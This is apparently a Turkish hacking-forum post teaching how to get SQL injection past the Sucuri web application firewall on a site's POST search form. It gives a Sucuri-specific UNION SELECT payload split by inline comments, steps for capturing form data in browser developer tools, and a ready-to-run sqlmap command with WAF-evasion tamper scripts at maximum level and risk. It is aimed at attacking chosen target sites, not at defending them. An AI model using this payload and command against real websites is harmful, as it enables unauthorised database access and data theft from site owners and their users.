SQLmap Sucuri Post Injection (1 Viewer)

Joined
Feb 17, 2021
Credits
298
Rating - 0%
güzel bir method ile sizlerleyim

View hidden content is available for registered users!

Method sadece post bölümlerde çalışmaktadır.

Çoğu buster'ların düşmanı olan waf engelinin bir çok çeşidi vardır. Örnek veriyorum modsecurity, cloud linux, cf ,sucuri vb. waf'lar. Bazı waf'ları tamper ve bir kaç parametre ile geçebiliyorsunuz ama yeni nesil çıkan waflar biraz da olsa bizleri zorluyor

Bugün sucuri waf bypass'ını anlatıcam. İlk olarak sucuri olan bir hedef site belirledik diyelim.

Mesela hedef sitemizde basit olarak search bölümü mevcut, çoğu insan burp ile search yolunu fuzzlar ve --form parametleri ile otomatik şekilde payload denemesini belirtir. WAF'LAR İÇİN BU YANLIŞTIR.

1617714435899.png

Sucuri için belirli bazı parametreler var bir tanesini de size veriyim.

Sucuri Payload : [B]r'Questions\?.+cloudproxy@sucuri\.net',/?id=1+un/**/ion+sel/**/ect+1,2,3-- or ''[/B]

Örnek olarak girdik, burp ile ister fuzz yaparsınız isterseniz f12 ile form data çekersiniz. (Form Data çekmek için F12 + Network bölümüne gelin)

1617714581046.png
Payloadınımızı girip buton olarak hangisi varsa ona basın, Buton ismi Search olur ara olur go olur değişir.


1617714749353.png
F12'den network'e gelmiştik ve f12 açık iken go dedik. Asıl req atılan url'i bize verdi burdan yola çıkarak işlemlerimize devam edicez.



1617714839914.png
Sırada form data bölümü var en altta yer alır. Nasıl kopyayalacağım diye sorarsanız view source butonuna basın. üstte zaten belli.


View source'ye bastık ve form data'mızı aldık. Burp ilede yapabilirsiniz bu işlemi ben kısa yolunu gösteriyorum.
1617714930221.png
kopyalıyoruz ve sqlmap komutlarımızı giriyoruz.


sqlmap.py -u "http://site.com/search.php?test=query" --data="searchFor=r%27Questions%5C%3F.%2Bcloudproxy%40sucuri%5C.net%27%2C%2F%3Fid%3D1%2Bun%2F**%2Fion%2Bsel%2F**%2Fect%2B1%2C2%2C3--+or+%27%27&goButton=go" -p searchFor --identify-waf --random-agent --no-cast --tamper=greatest --level=5 --risk=3

hazır, eğer web site hakkında bilginiz varsa. yani db hakkında server hakkında ona göre tamper değiştirebilirsiniz.
 

Users who are viewing this thread

Top